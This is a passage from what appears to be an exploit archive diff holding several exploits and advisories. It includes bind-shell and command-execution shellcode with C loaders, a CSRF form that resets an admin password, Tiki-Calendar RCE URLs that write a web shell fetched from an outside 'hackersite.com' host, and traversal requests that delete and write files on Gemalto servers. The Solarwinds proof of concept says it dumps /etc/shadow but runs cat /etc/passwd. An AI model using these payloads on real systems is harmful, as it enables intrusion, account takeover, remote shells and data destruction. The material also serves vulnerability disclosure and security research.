mov ecx, esp; we grab the memeory location of our args and move it to ecx
int 0x80; execute the syscall socketcall
mov edx, eax; this saves the Socket FD for the client
; We can now use dup2 to create all 3 of our std's, in/out/err so that our shellhas access to it over the socket
; dup2(clientfd)
xor eax, eax; 0's out eax
xor ecx, ecx; 0's out ecx since our first std FD is in so its 0
mov al, 63; we now move the syscall for dup2 into al
mov ebx, edx; we now move the client socket FD into ebx
int 0x80; execute the dup2 syscall
xor eax, eax; 0's out the eax reg due to any return's happening
xor ecx, ecx; 0's out ecx
mov al, 63; this is the syscall for dup2
mov cl, 0x1; we now set cl to the FD of stdout
int 0x80; execut the dup2 syscall
xor eax, eax; 0's out eax
mov al, 63; moves the dup2 syscall
mov cl, 0x2; we now set cl to the stderr FD
int 0x80; execute the dup2 syscall
; We can now execute our shell in /bin/bash
xor eax, eax ; we first need our nulls
push eax ; this will push a drowd of nulls onto the stack
; this section of pushes are the string ////bin/bash from our pyhton 1 liner above
push 0x68736162
push 0x2f6e6962
push 0x2f2f2f2f
mov ebx, esp ; this moves the memory address of esp(pointing to our string & nulls)
; from the stack into ebx where execve is expecting the name of the application + a null
push eax ; this pushes another null onto the stack
mov edx, esp ; this now gets the memory address of the nulls we just pushed onto the stack into edx, this is for envp so it can just be null
push ebx ; this pushes the memory address of our string onto the stack
mov ecx, esp ; this moves the address of our string from the stack to ecx
mov al, 0xb ; this will load the syscall # 11
int 0x80 ; execute the system call
*/
// Python code to get the instruction in HEX of the string reversed to place into the stack
// python -c 'string="//etc/shadow";splitNum=8;print "\nLength: %s" % len(string[::-1]);string=string[::-1].encode("hex"); \
// string=["push 0x"+str(string[i:i+splitNum]) for i in range(0, len(string), splitNum)]; \
// print "Hex List:\n"; print("\n".join(h for h in string))'
// Port: 4444 (\x5c\x11) in shellcode
// ShellCode---
// Bytes: 656
// Tested on: Linux 3.13.0-32, Ubuntu 12.04.5 LTS, X86
//------------- OBJDUMP -------------
//execve-stack-bind: file format elf32-i386
//Disassembly of section .text:
//8048060 <_start>:
//8048060: 31 c0 xor eax,eax
//8048062: 50 push eax
//8048063: 66 b8 66 00 mov ax,0x66
//8048067: 31 db xor ebx,ebx
//8048069: b3 01 mov bl,0x1
//804806b: 6a 01 push 0x1
//804806d: 6a 02 push 0x2
//804806f: 89 e1 mov ecx,esp
//8048071: cd 80 int 0x80
//8048073: 89 c2 mov edx,eax
//8048075: 31 c0 xor eax,eax
//8048077: 66 b8 66 00 mov ax,0x66
//804807b: 31 db xor ebx,ebx
//804807d: b3 14 mov bl,0x14
//804807f: 6a 04 push 0x4
//8048081: 54 push esp
//8048082: 6a 02 push 0x2
//8048084: 6a 01 push 0x1
//8048086: 52 push edx
//8048087: 89 e1 mov ecx,esp
//8048089: cd 80 int 0x80
//804808b: 31 c0 xor eax,eax
//804808d: 66 b8 66 00 mov ax,0x66
//8048091: 31 db xor ebx,ebx
//8048093: 53 push ebx
//8048094: b3 02 mov bl,0x2
//8048096: 66 68 11 5c pushw 0x5c11
//804809a: 66 6a 02 pushw 0x2
//804809d: 89 e1 mov ecx,esp
//804809f: 6a 16 push 0x16
//80480a1: 51 push ecx
//80480a2: 52 push edx
//80480a3: 89 e1 mov ecx,esp
//80480a5: cd 80 int 0x80
//80480a7: 31 c0 xor eax,eax
//80480a9: 31 db xor ebx,ebx
//80480ab: 53 push ebx
//80480ac: 66 b8 66 00 mov ax,0x66
//80480b0: b3 04 mov bl,0x4
//80480b2: 52 push edx
//80480b3: 89 e1 mov ecx,esp
//80480b5: cd 80 int 0x80
//80480b7: 31 c0 xor eax,eax
//80480b9: 31 db xor ebx,ebx
//80480bb: 53 push ebx
//80480bc: 53 push ebx
//80480bd: 66 b8 66 00 mov ax,0x66
//80480c1: b3 05 mov bl,0x5
//80480c3: 52 push edx
//80480c4: 89 e1 mov ecx,esp
//80480c6: cd 80 int 0x80
//80480c8: 89 c2 mov edx,eax
//80480ca: 31 c0 xor eax,eax
//80480cc: 31 c9 xor ecx,ecx
//80480ce: b0 3f mov al,0x3f
//80480d0: 89 d3 mov ebx,edx
//80480d2: cd 80 int 0x80
//80480d4: 31 c0 xor eax,eax
//80480d6: 31 c9 xor ecx,ecx
//80480d8: b0 3f mov al,0x3f
//80480da: b1 01 mov cl,0x1
//80480dc: cd 80 int 0x80
//80480de: 31 c0 xor eax,eax
//80480e0: b0 3f mov al,0x3f
//80480e2: b1 02 mov cl,0x2
//80480e4: cd 80 int 0x80
//80480e6: 31 c0 xor eax,eax
//80480e8: 50 push eax
//80480e9: 68 62 61 73 68 push 0x68736162
//80480ee: 68 62 69 6e 2f push 0x2f6e6962
//80480f3: 68 2f 2f 2f 2f push 0x2f2f2f2f
//80480f8: 89 e3 mov ebx,esp
//80480fa: 50 push eax
//80480fb: 89 e2 mov edx,esp
//80480fd: 53 push ebx
//80480fe: 89 e1 mov ecx,esp
//8048100: b0 0b mov al,0xb
//8048102: cd 80 int 0x80
//------------- OBJDUMP -------------
#include<stdio.h>
#include<string.h>
unsigned char code[] = \
"\x31\xc0\x50\x66\xb8\x66\x00\x31\xdb\xb3\x01\x6a\x01\x6a\x02\x89\xe1\xcd\x80"
"\x89\xc2\x31\xc0\x66\xb8\x66\x00\x31\xdb\xb3\x14\x6a\x04\x54\x6a\x02\x6a\x01"
"\x52\x89\xe1\xcd\x80\x31\xc0\x66\xb8\x66\x00\x31\xdb\x53\xb3\x02\x66\x68"
"\x11\x5c" //<----PORT #4444
"\x66\x6a\x02\x89\xe1\x6a\x16\x51\x52\x89\xe1\xcd\x80\x31\xc0\x31\xdb\x53"
"\x66\xb8\x66\x00\xb3\x04\x52\x89\xe1\xcd\x80\x31\xc0\x31\xdb\x53\x53\x66\xb8"
"\x66\x00\xb3\x05\x52\x89\xe1\xcd\x80\x89\xc2\x31\xc0\x31\xc9\xb0\x3f\x89\xd3"
"\xcd\x80\x31\xc0\x31\xc9\xb0\x3f\xb1\x01\xcd\x80\x31\xc0\xb0\x3f\xb1\x02\xcd"
"\x80\x31\xc0\x50\x68\x62\x61\x73\x68\x68\x62\x69\x6e\x2f\x68\x2f\x2f\x2f\x2f"
"\x89\xe3\x50\x89\xe2\x53\x89\xe1\xb0\x0b\xcd\x80";
main()
{
printf("Shellcode Length: %d\n", strlen(code));
int (*ret)() = (int(*)())code;
ret();
}

51
platforms/linux/local/39967.txt Executable file
View file

@ -0,0 +1,51 @@
Product: Solarwinds Virtualization Manager
Vendor: Solarwinds
Vulnerable Version(s): < 6.3.1
Tested Version: 6.3.1
Vendor Notification: April 25th, 2016
Vendor Patch Availability to Customers: June 1st, 2016
Public Disclosure: June 14th, 2016
Vulnerability Type: Security Misconfiguration
CVE Reference: CVE-2016-3643
Risk Level: High
CVSSv2 Base Score: 7.8 (CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H/E:H/RL:W/RC:C/CR:M/IR:M/AR:M/MAV:L/MAC:L/MPR:L/MUI:N/MS:C/MC:H/MI:H/MA:H)
Solution Status: Solution Available
Discovered and Provided: Nate Kettlewell, Depth Security ( https://www.depthsecurity.com/ )
-----------------------------------------------------------------------------------------------
Advisory Details:
Depth Security discovered a vulnerability in Solarwinds Virtualization Manager appliance.
This attack requires a user to have an operating system shell on the vulnerable appliance.
1) Misconfiguration of sudo in Solarwinds Virtualization Manager: CVE-2016-3643
The vulnerability exists due to the miconfiguration of sudo in that it allows any local user to use sudo to execute commands as the superuser.
A local attacker can obtain root privileges to the operating system regardless of privilege level.
-----------------------------------------------------------------------------------------------
Solution:
Solarwinds has released a hotfix to remediate this vulnerability on existing installations.
This flaw as well as several others have been corrected and that release has been put into manufacturing for new appliances.
-----------------------------------------------------------------------------------------------
Proof of Concept:
The following is an example of the commands necessary for a low-privileged user to dump the contents of the "/etc/shadow" file by using sudo.
sudo cat /etc/passwd
-----------------------------------------------------------------------------------------------
References:
[1] Solarwinds Virtualization Manager- http://www.solarwinds.com/virtualization-manager - Solarwinds Virtualization Manager provides monitoring and remediation for virtualized environments.

401
platforms/multiple/shellcode/39885.c Executable file
View file

@ -0,0 +1,401 @@
/**
# Title : Execute command on Linux/Windows/BSD x86_64 execve("/bin//sh", {"//bin/sh", "-c", "cmd"}, NULL) shellcode
# Date : 04-06-2016
# Author : @odzhancode
# Tested On : Debian x86/x64, FreeBSD x64, OpenBSD x64, Windows x86, Windows x64
*/
; **************************************
; exec.asm
;
; Execute a command
; Works on 32/64-bit versions of Windows and Linux, 64-bit versions of FreeBSD/OpenBSD
;
; yasm -fbin exec.asm -oexec.bin
; nasm -fbin exec.asm -oexec.bin
;
; 194 bytes
;
bits 32
push esi
push edi
push ebx
push ebp
xor ecx, ecx ; ecx=0
mul ecx ; eax=0, edx=0
push eax
push eax
push eax
push eax
push eax ; setup homespace for win64
jmp l_sb ; load command
get_os:
pop edi ; edi=cmd, argv
mov cl, 7
; initialize cmd/argv regardless of OS
push eax ; argv[3]=NULL;
push edi ; argv[2]=cmd
repnz scasb ; skip command line
stosb ; zero terminate
push edi ; argv[1]="-c", 0
scasw ; skip option
stosb ; zero terminate
push edi ; argv[0]="/bin//sh", 0
push esp ; save argv
push edi ; save pointer to "/bin//sh", 0
mov al, 6 ; eax=sys_close for Linux/BSD
inc ecx ; ignored on x64
jecxz gos_x64 ; if ecx==0 we're 64-bit
; we're 32-bit
; if gs is zero, we're native 32-bit windows
mov cx, gs
jecxz win_cmd
; if eax is zero after right shift of SP, ASSUME we're on windows
push esp
pop eax
shr eax, 24
jz win_cmd
; we're 32-bit Linux
mov al, 11 ; eax=sys_execve
pop ebx ; ebx="/bin//sh", 0
pop ecx ; ecx=argv
int 0x80
; we're 64-bit, execute syscall and see what
; error returned
gos_x64:
push -1
pop edi
syscall
cmp al, 5 ; Access Violation indicates windows
push 59
pop eax
cdq
jz win_cmd
pop edi ; rdi="/bin//sh", 0
pop esi ; rsi=argv
syscall
l_sb:
jmp ld_cmd
; following code is derived from Peter Ferrie's calc shellcode
; i've modified it to execute commands
win_cmd:
pop eax ; eax="/bin//sh", 0
pop eax ; eax=argv
pop eax ; eax="/bin//sh", 0
pop eax ; eax="-c", 0
pop ecx ; ecx=cmd
pop eax ; eax=0
inc eax
xchg edx, eax
jz x64
push eax ; will hide
push ecx ; cmd
mov esi, [fs:edx+2fh]
mov esi, [esi+0ch]
mov esi, [esi+0ch]
lodsd
mov esi, [eax]
mov edi, [esi+18h]
mov dl, 50h
jmp lqe
bits 64
x64:
mov dl, 60h
mov rsi, [gs:rdx]
mov rsi, [rsi+18h]
mov rsi, [rsi+10h]
lodsq
mov rsi, [rax]
mov rdi, [rsi+30h]
lqe:
add edx, [rdi+3ch]
mov ebx, [rdi+rdx+28h]
mov esi, [rdi+rbx+20h]
add rsi, rdi
mov edx, [rdi+rbx+24h]
fwe:
movzx ebp, word [rdi+rdx]
lea rdx, [rdx+2]
lodsd
cmp dword [rdi+rax], 'WinE'
jne fwe
mov esi, [rdi+rbx+1ch]
add rsi, rdi
mov esi, [rsi+rbp*4]
add rdi, rsi
cdq
call rdi
cmd_end:
bits 32
pop eax
pop eax
pop eax
pop eax
pop eax
pop ebp
pop ebx
pop edi
pop esi
ret
ld_cmd:
call get_os
; place command here
;db "notepad", 0xFF
; do not change anything below
;db "-c", 0xFF, "/bin//sh", 0
// *************** xcmd.c
/**
Copyright © 2016 Odzhan. All Rights Reserved.
Redistribution and use in source and binary forms, with or without
modification, are permitted provided that the following conditions are
met:
1. Redistributions of source code must retain the above copyright
notice, this list of conditions and the following disclaimer.
2. Redistributions in binary form must reproduce the above copyright
notice, this list of conditions and the following disclaimer in the
documentation and/or other materials provided with the distribution.
3. The name of the author may not be used to endorse or promote products
derived from this software without specific prior written permission.
THIS SOFTWARE IS PROVIDED BY AUTHORS "AS IS" AND ANY EXPRESS OR
IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED
WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
DISCLAIMED. IN NO EVENT SHALL THE AUTHOR BE LIABLE FOR ANY DIRECT,
INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES
(INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT,
STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN
ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
POSSIBILITY OF SUCH DAMAGE. */
#include <stdio.h>
#include <stdlib.h>
#include <stdint.h>
#include <string.h>
#if defined (_WIN32) || defined(_WIN64)
#define WIN
#include <windows.h>
#else
#include <sys/mman.h>
#endif
#define CMD_LEN_OFS 0x10+1
#define EXEC_SIZE 194
char exec[]= {
/* 0000 */ "\x56" /* push esi */
/* 0001 */ "\x57" /* push edi */
/* 0002 */ "\x53" /* push ebx */
/* 0003 */ "\x55" /* push ebp */
/* 0004 */ "\x31\xc9" /* xor ecx, ecx */
/* 0006 */ "\xf7\xe1" /* mul ecx */
/* 0008 */ "\x50" /* push eax */
/* 0009 */ "\x50" /* push eax */
/* 000A */ "\x50" /* push eax */
/* 000B */ "\x50" /* push eax */
/* 000C */ "\x50" /* push eax */
/* 000D */ "\xeb\x37" /* jmp 0x46 */
/* 000F */ "\x5f" /* pop edi */
/* 0010 */ "\xb1\x00" /* mov cl, 0x0 */
/* 0012 */ "\x50" /* push eax */
/* 0013 */ "\x57" /* push edi */
/* 0014 */ "\xf2\xae" /* repne scasb */
/* 0016 */ "\xaa" /* stosb */
/* 0017 */ "\x57" /* push edi */
/* 0018 */ "\x66\xaf" /* scasw */
/* 001A */ "\xaa" /* stosb */
/* 001B */ "\x57" /* push edi */
/* 001C */ "\x54" /* push esp */
/* 001D */ "\x57" /* push edi */
/* 001E */ "\xb0\x06" /* mov al, 0x6 */
/* 0020 */ "\x41" /* inc ecx */
/* 0021 */ "\xe3\x12" /* jecxz 0x35 */
/* 0023 */ "\x66\x8c\xe9" /* mov cx, gs */
/* 0026 */ "\xe3\x20" /* jecxz 0x48 */
/* 0028 */ "\x54" /* push esp */
/* 0029 */ "\x58" /* pop eax */
/* 002A */ "\xc1\xe8\x18" /* shr eax, 0x18 */
/* 002D */ "\x74\x19" /* jz 0x48 */
/* 002F */ "\xb0\x0b" /* mov al, 0xb */
/* 0031 */ "\x5b" /* pop ebx */
/* 0032 */ "\x59" /* pop ecx */
/* 0033 */ "\xcd\x80" /* int 0x80 */
/* 0035 */ "\x6a\xff" /* push 0xffffffff */
/* 0037 */ "\x5f" /* pop edi */
/* 0038 */ "\x0f\x05" /* syscall */
/* 003A */ "\x3c\x05" /* cmp al, 0x5 */
/* 003C */ "\x6a\x3b" /* push 0x3b */
/* 003E */ "\x58" /* pop eax */
/* 003F */ "\x99" /* cdq */
/* 0040 */ "\x74\x06" /* jz 0x48 */
/* 0042 */ "\x5f" /* pop edi */
/* 0043 */ "\x5e" /* pop esi */
/* 0044 */ "\x0f\x05" /* syscall */
/* 0046 */ "\xeb\x75" /* jmp 0xbd */
/* 0048 */ "\x58" /* pop eax */
/* 0049 */ "\x58" /* pop eax */
/* 004A */ "\x58" /* pop eax */
/* 004B */ "\x58" /* pop eax */
/* 004C */ "\x59" /* pop ecx */
/* 004D */ "\x58" /* pop eax */
/* 004E */ "\x40" /* inc eax */
/* 004F */ "\x92" /* xchg edx, eax */
/* 0050 */ "\x74\x16" /* jz 0x68 */
/* 0052 */ "\x50" /* push eax */
/* 0053 */ "\x51" /* push ecx */
/* 0054 */ "\x64\x8b\x72\x2f" /* mov esi, [fs:edx+0x2f] */
/* 0058 */ "\x8b\x76\x0c" /* mov esi, [esi+0xc] */
/* 005B */ "\x8b\x76\x0c" /* mov esi, [esi+0xc] */
/* 005E */ "\xad" /* lodsd */
/* 005F */ "\x8b\x30" /* mov esi, [eax] */
/* 0061 */ "\x8b\x7e\x18" /* mov edi, [esi+0x18] */
/* 0064 */ "\xb2\x50" /* mov dl, 0x50 */
/* 0066 */ "\xeb\x17" /* jmp 0x7f */
/* 0068 */ "\xb2\x60" /* mov dl, 0x60 */
/* 006A */ "\x65\x48" /* dec eax */
/* 006C */ "\x8b\x32" /* mov esi, [edx] */
/* 006E */ "\x48" /* dec eax */
/* 006F */ "\x8b\x76\x18" /* mov esi, [esi+0x18] */
/* 0072 */ "\x48" /* dec eax */
/* 0073 */ "\x8b\x76\x10" /* mov esi, [esi+0x10] */
/* 0076 */ "\x48" /* dec eax */
/* 0077 */ "\xad" /* lodsd */
/* 0078 */ "\x48" /* dec eax */
/* 0079 */ "\x8b\x30" /* mov esi, [eax] */
/* 007B */ "\x48" /* dec eax */
/* 007C */ "\x8b\x7e\x30" /* mov edi, [esi+0x30] */
/* 007F */ "\x03\x57\x3c" /* add edx, [edi+0x3c] */
/* 0082 */ "\x8b\x5c\x17\x28" /* mov ebx, [edi+edx+0x28] */
/* 0086 */ "\x8b\x74\x1f\x20" /* mov esi, [edi+ebx+0x20] */
/* 008A */ "\x48" /* dec eax */
/* 008B */ "\x01\xfe" /* add esi, edi */
/* 008D */ "\x8b\x54\x1f\x24" /* mov edx, [edi+ebx+0x24] */
/* 0091 */ "\x0f\xb7\x2c\x17" /* movzx ebp, word [edi+edx] */
/* 0095 */ "\x48" /* dec eax */
/* 0096 */ "\x8d\x52\x02" /* lea edx, [edx+0x2] */
/* 0099 */ "\xad" /* lodsd */
/* 009A */ "\x81\x3c\x07\x57\x69\x6e\x45" /* cmp dword [edi+eax], 0x456e6957 */
/* 00A1 */ "\x75\xee" /* jnz 0x91 */
/* 00A3 */ "\x8b\x74\x1f\x1c" /* mov esi, [edi+ebx+0x1c] */
/* 00A7 */ "\x48" /* dec eax */
/* 00A8 */ "\x01\xfe" /* add esi, edi */
/* 00AA */ "\x8b\x34\xae" /* mov esi, [esi+ebp*4] */
/* 00AD */ "\x48" /* dec eax */
/* 00AE */ "\x01\xf7" /* add edi, esi */
/* 00B0 */ "\x99" /* cdq */
/* 00B1 */ "\xff\xd7" /* call edi */
/* 00B3 */ "\x58" /* pop eax */
/* 00B4 */ "\x58" /* pop eax */
/* 00B5 */ "\x58" /* pop eax */
/* 00B6 */ "\x58" /* pop eax */
/* 00B7 */ "\x58" /* pop eax */
/* 00B8 */ "\x5d" /* pop ebp */
/* 00B9 */ "\x5b" /* pop ebx */
/* 00BA */ "\x5f" /* pop edi */
/* 00BB */ "\x5e" /* pop esi */
/* 00BC */ "\xc3" /* ret */
/* 00BD */ "\xe8\x4d\xff\xff\xff" /* call 0xf */
};
// save code to binary file
void bin2file (uint8_t bin[], size_t len)
{
FILE *out=fopen ("sh_cmd.bin", "wb");
if (out!=NULL)
{
fwrite (bin, 1, len, out);
fclose (out);
}
}
// allocate read/write and executable memory
// copy data from code and execute
void xcode(void *code, size_t code_len, char *cmd, size_t cmd_len)
{
void *bin;
uint8_t *p;
char args[]="\xFF-c\xFF/bin//sh\x00";
size_t arg_len;
arg_len=strlen(args) + 1;
printf ("[ executing code...\n");
#ifdef WIN
bin=VirtualAlloc (0, code_len + cmd_len + arg_len,
MEM_COMMIT, PAGE_EXECUTE_READWRITE);
#else
bin=mmap (0, code_len + cmd_len + arg_len,
PROT_EXEC | PROT_WRITE | PROT_READ,
MAP_ANON | MAP_PRIVATE, -1, 0);
#endif
if (bin!=NULL)
{
p=(uint8_t*)bin;
memcpy (p, code, code_len);
// set the cmd length
p[CMD_LEN_OFS] = (uint8_t)cmd_len;
// copy cmd
memcpy ((void*)&p[code_len], cmd, cmd_len);
// copy argv
memcpy ((void*)&p[code_len+cmd_len], args, arg_len);
//DebugBreak();
bin2file(bin, code_len+cmd_len+arg_len);
// execute
((void(*)())bin)();
#ifdef WIN
VirtualFree (bin, code_len+cmd_len+arg_len, MEM_RELEASE);
#else
munmap (bin, code_len+cmd_len+arg_len);
#endif
}
}
int main(int argc, char *argv[])
{
size_t len;
char *cmd;
if (argc != 2) {
printf ("\n usage: xcmd <command>\n");
return 0;
}
cmd=argv[1];
len=strlen(cmd);
if (len==0 || len>255) {
printf ("\n invalid command length: %i (must be between 1 and 255)", len);
return 0;
}
xcode(exec, EXEC_SIZE, cmd, len);
return 0;
}

27
platforms/php/webapps/39963.txt Executable file
View file

@ -0,0 +1,27 @@
# Exploit Title: Roxy Fileman <= 1.4.4 Forbidden File Upload Vulnerability
# Google Dork: intitle:"Roxy file manager"
# Date: 15-06-2016
# Exploit Author: Tyrell Sassen
# Vendor Homepage: http://www.roxyfileman.com/
# Software Link: http://www.roxyfileman.com/download.php?f=1.4.4-php
# Version: 1.4.4
# Tested on: PHP
1. Description
The Roxy File Manager has a configuration setting named FORBIDDEN_UPLOADS,
which keeps a list of forbidden file extensions that the application will
not allow to be uploaded. This configuration setting is also checked when
renaming an existing file to a new file extension.
It is possible to bypass this check and rename already uploaded files to
any extension, using the move function as this function does not perform
any checks.
2. Proof of Concept
http://host/fileman/php/movefile.php?f=/Upload/backdoor.jpg&n=/Upload/backdoor.php
The renamed file will now be accessible at http://host/Upload/backdoor.php

47
platforms/php/webapps/39964.html Executable file
View file

@ -0,0 +1,47 @@
<!--
# Exploit Title: CSRF Vulnerability on Slim CMS v0.1
# CMS Link: https://github.com/revuls/SlimCMS/releases
# Date: 16th June'2016
# Exploit Author: Avinash Kumar Thapa aka "-Acid"
# Vendor Homepage: http://www.slimcms.nl/
# Software Link: https://github.com/revuls/SlimCMS/releases
# Version: Slim CMSv0.1
# Tested on: Windows 10, XAMPP
# Twitter: https://twitter.com/m_avinash143
CSRF : Cross-Site Request Forgery (CSRF) is a type of attack that occurs when a malicious web site, email, blog, instant message, or program causes a user's web browser to perform an unwanted action on a trusted site for which the user is currently authenticated.
Vulnerability Description :
It is possible to change the password of the administrator and complete account can be take over using this.
Steps to Reproduce the same
1. Login into the account.
2. Navigate to http://localhost/SlimCMS/admin/config
3. Fill the details and intecept the request using BurpSuite
Request Intercepted
-------------------
-->
<html>
<body>
<form action="http://localhost/SlimCMS/api/config" method="POST">
<input type="hidden" name="title" value="&#123;&#123;7&#42;7&#125;&#125;" />
<input type="hidden" name="description" value="&#123;&#123;7&#42;7&#125;&#125;" />
<input type="hidden" name="user" value="admin" />
<input type="hidden" name="password" value="password" />
<input type="hidden" name="theme" value="default" />
<input type="hidden" name="url" value="http&#58;&#47;&#47;localhost&#47;SlimCMS" />
<input type="submit" value="Submit request" />
</form>
</body>
</html>
<!--
4. Send the link to victim and password will be changed for the admin user (Once the victim's clicks on the URL).
-->

26
platforms/php/webapps/39965.txt Executable file
View file

@ -0,0 +1,26 @@
# Exploit Title: Tiki-Calendar-RCE
# Google Dork: inurl:tiki-calendar.php
# Date: 2015-12-16
# Exploit Author: Dany Ouellet
# Vendor Homepage: https://tiki.org/article414-Important-Security-Fix-for-all-versions-of-Tiki
# Software Link: https://tiki.org/Download
# Version: ALL supported versions of Tiki (14.2, 12.5 LTS, 9.11 LTS and 6.15)(if not patched)
# Tested on: Windows and Linux
Hi, I recently discover an important flaw in CMS Tiki-Wiki. I reported the
vulnerability directly to vendor and a patch is now avalaible. So I release
the exploit. ;)
PoC:
Validate the vulnerability:
http://victimesite/tiki-calendar.php?viewmode=';print(TikiWikiRCE);$a='
Write or deface the site:
http://victimesite/tiki-calendar.php?viewmode=%27;%20$z=fopen(%22index6.php%22,%27w%27);%20fwrite($z,(%22TikiWikiRCE%22));fclose($z);$a=%27
Execute a php shellcode:
http://victimesite/tiki-calendar.php?viewmode=%27;%20$z=fopen%28%22shell.php%22,%27w%27%29;fwrite%28$z,file_get_contents%28%22http://hackersite.com/r57.txt%22%29%29;fclose%28$z%29;%27

48
platforms/windows/dos/39966.txt Executable file
View file

@ -0,0 +1,48 @@
1. Vulnerable Product Version:
*Blat v3.2.14*
Link: blat.net
2. Vulnerability Information
Impact: Attacker may gain administrative access / can perform a DOS
Remotely Exploitable: No
Locally Exploitable: May be possible
3. Product Details
An open source Windows (32 & 64 bit) command line SMTP mailer. We can use
it to automatically email logs, the contents of a html FORM, or whatever
else you need to send.
Since blat is lightweight, user friendly and simple (but awesome) many
vendors incorporates it with their Softwares. I have seen blat in many
commercial Softwares which use it for sending mails to its customers. And
Blat is awesome.
4. Vulnerability Description
The Overflow vulnerability lies in the profile option parameter “p”. When
a string of 236 bytes is send to blat, the EBP and EIP register gets
overwritten by the user input.
Reproduction:
* blat.exe crashes with this command blat.exe install
smtp.my.tld 127.0.0.1 p <”A”*234+”B”*2>*
Feeding this command overwrites EBP with 0x00410041 and EIP with 0x00420042
(Please refer to the attached screen shot)
5. Links
https://sourceforge.net/projects/blat/
https://groups.yahoo.com/neo/groups/blat/conversations/messages/13759

99
platforms/windows/webapps/39968.txt Executable file
View file

@ -0,0 +1,99 @@

Gemalto Sentinel License Manager 18.0.1 Directory Traversal Vulnerability
Vendor: Gemalto NV | SafeNet, Inc
Product web page: http://www.gemalto.com | http://www.safenet-inc.com
Affected version: 18.0.1.55505
Summary: The Sentinel License Manager enforces and manages licensing
in multi-user environment. It keeps track of all the licenses and
handles requests from network users who want to run your application,
granting authorization to the requesters to allow them to run the
application, and denying requests when all licenses are in use. It is
an integral component of the network licensing schemes that can be
implemented with Sentinel RMS, namely server-locked licenses, site
licenses and commuter licenses.
Desc: Input passed via the 'alpremove' and 'check_in_file' parameters
is not properly verified in '/_int_/action.html' and '/_int_/checkin_file.html'
before being used to delete and create files. This can be exploited to
arbitrarily delete sensitive information on a system and/or write files
via directory traversal attacks.
Tested on: Microsoft Windows 7 Ultimate SP1 (EN)
HASP LM/18.00 (web server)
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
@zeroscience
Advisory ID: ZSL-2016-5330
Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2016-5330.php
26.04.2016
--
1. Unauthenticated file removal using POST or GET:
--------------------------------------------------
1st request renames the file to meaning_of_life.txt.bak
2nd request removes the file entirely from C:\
--------------------------------------------------------
POST /_int_/action.html HTTP/1.1
Host: localhost:1947
alpremove=/../../../../../../../meaning_of_life.txt
OR
1st req: GET http://localhost:1947/_int_/action.html?alpremove=/../../../../../../../meaning_of_life.txt HTTP/1.1
2nd req: GET http://localhost:1947/_int_/action.html?alpremove=/../../../../../../../meaning_of_life.txt HTTP/1.1
2. Unauthenticated file write:
------------------------------
PoC that creates license file in C:\
-------------------------------------
POST /_int_/checkin_file.html HTTP/1.1
Host: localhost:1947
Content-Length: 770
Cache-Control: max-age=0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Origin: http://localhost:1947
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.112 Safari/537.36
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryVlbofFpDmUw9CugB
Referer: http://localhost:1947/_int_/checkin.html
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.8
Cookie: hasplmlang=_int_
Connection: close
------WebKitFormBoundaryVlbofFpDmUw9CugB
Content-Disposition: form-data; name="check_in_file"; filename="\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\jxzp"
Content-Type: application/octet-stream
<?xml version="1.0" encoding="UTF-8" ?>
<location>
<license_manager id="\..\..\..\..\..\..\..\..\..\..\..\juuzzta" time="0">
<version>18.0.1.55505</version>
<hostname>LAB-ZSL</hostname>
<name>LAB-ZSL</name>
<host_fingerprint type="SL-AdminMode" crc="1439826437">
MXhJSWPdmwJr2iAIUgAGKBk/7N4U2GbJjLA6hGC1VHDvrsA2W+8e2ChuAFYgF6ZG
ttm6N6iupYkEEHzcQQrG1r0pIGBarRkAy0GR46nuTYFtm8iAMA5IBQoP82wKbLMl
gUKpUABvAmhFimCbrXumJpsOA8ApTjaU12zdm0LkvsgTAPECCFTau
</host_fingerprint>
</license_manager>
</location>
------WebKitFormBoundaryVlbofFpDmUw9CugB--